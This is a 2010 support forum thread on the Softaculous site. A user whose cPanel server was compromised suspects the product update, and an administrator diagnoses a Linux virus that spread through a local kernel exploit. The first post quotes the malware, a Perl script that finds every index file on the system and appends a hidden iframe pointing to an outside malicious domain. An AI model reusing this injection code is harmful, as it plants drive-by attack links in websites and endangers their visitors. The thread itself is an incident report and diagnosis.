new update is got a bad side effect.

You are here: Index > Softaculous Auto Installer > Bugs > Topic : new update is got a bad side effect.

Threaded Mode | Print

new update is got a bad side effect. (4 Replies, Read 89255 times)

streetmedic	# June 9, 2010, 12:05 am
Group: Member Post Group: Newbie Posts: 5 Status:	Ok easy way to explain this is on the 6th you updated your files to 2.9 ver and today i noticed in my ftp new files http://rapidshare.com/files/396864984/files.rar.html on the sith at this time i send a reprt to my web host that i cant get into my admin panel i was locked out CPAnel 2 hours hacked then today i put all the info into terms they can see but they are idiots and will be deleting my my money for support that wont help and say it my faul So i am coming to your attention that that it was most likely installed at the time your update was opened a new directory linux-sendpage3 was made after updating to or around the time your update completed follow this directions to see how Go to untiled.jpg i am attaching my rar witht he image file in the rar open that pic file notice the dates and times . after open index.php to show the files modified then open the 993698.txt file and notice the link at the bottom. #!/usr/bin/perl system("locate index.* >> index"); system("find / -name index.* >> index"); open(a,"<index"); @ind = <a>; close(a); $b = scalar(@ind); for($a=0;$a<=$b;$a++){ chomp $ind[$a]; system("echo ' <iframe src=\"http:\/\/zuo.podgorz.org\/zuo\/elen\/index.php\" width=\"0\" height=\"0\" frameborder=\"0\"><\/iframe>\' >> $ind[$a]"); open anybrowser and input that links maker addy this link zuo.podgorz.org Whamm you get a unsafe url http://www.securityfocus.com/bid/36038/exploit seems i cant aqttach the files to support let em know how i can help further Edited by streetmedic : June 9, 2010, 12:10 am
IP: --

new update is got a bad side effect.

streetmedic	# June 9, 2010, 12:18 am \| Post: 1
Group: Member Post Group: Newbie Posts: 5 Status:	i deleted the rapidshare file as it showed priv info on my server admin please email me or msg me and ill send the rar file to you
IP: --

new update is got a bad side effect.

alons	# June 9, 2010, 4:29 am \| Post: 2
Group: Administrator Post Group: Super Member Posts: 2280 Status:	Hi, Please PM me the details. Regards, Alons ----------------------- For immediate support please email us at our Support email address. PMs sent to any Softaculous Team member or posting in the forums is not the official way to get support. Virtualizor - The Next Generation VPS Panel Webuzo - It is Softaculous Standalone for Enterprises, SMB, Developers. Deploy it on Dedicated Servers, VPS, Virtual Appliances or the Cloud Pinguzo - Server and Domain Monitoring tool PopularFX - Marketplace of WordPress, Drupal, Joomla, Bootstrap themes Remote Installer - Use Softaculous over FTP/FTPS/SFTP
IP: --

new update is got a bad side effect.

streetmedic	# June 9, 2010, 7:46 am \| Post: 3
Group: Member Post Group: Newbie Posts: 5 Status:	sent a pm
IP: --

new update is got a bad side effect.

alons	# June 9, 2010, 8:51 am \| Post: 4
Group: Administrator Post Group: Super Member Posts: 2280 Status:	Hi, This is a linux Virus which affects all index.php files. Softaculous has many fileindex.php files which is just a list of files in each script and actually not a web file. This virus will change the contents of all index.php files on the system. An interesting thing to note is that how did this virus reach your server in the first place ? The description of this virus says : " The Linux kernel is prone to a local NULL-pointer dereference vulnerability. A local attacker can exploit this issue to execute arbitrary code with superuser privileges or crash an affected kernel, denying service to legitimate users. Versions prior to the Linux kernel 2.4.37.5 and 2.6.31-rc6 are vulnerable. " So it must be a local user who must have exploited your system. Are there any other users on your system or is it a VPS or Dedicated server ? As per the image you sent me, it started in your /public_html folder It looks like a cPanel account and so it can also be from another shared hosting account on that server. ----------------------- For immediate support please email us at our Support email address. PMs sent to any Softaculous Team member or posting in the forums is not the official way to get support. Virtualizor - The Next Generation VPS Panel Webuzo - It is Softaculous Standalone for Enterprises, SMB, Developers. Deploy it on Dedicated Servers, VPS, Virtual Appliances or the Cloud Pinguzo - Server and Domain Monitoring tool PopularFX - Marketplace of WordPress, Drupal, Joomla, Bootstrap themes Remote Installer - Use Softaculous over FTP/FTPS/SFTP
IP: --

« Previous Next »

Threaded Mode | Print

Jump To :

Users viewing this topic
	1 guests, 0 users.

All times are GMT. The time now is April 20, 2024, 3:58 am.

Powered By AEF 1.0.8 © 2007-2008 Electron Inc.

Queries: 11 | Page Created In:0.021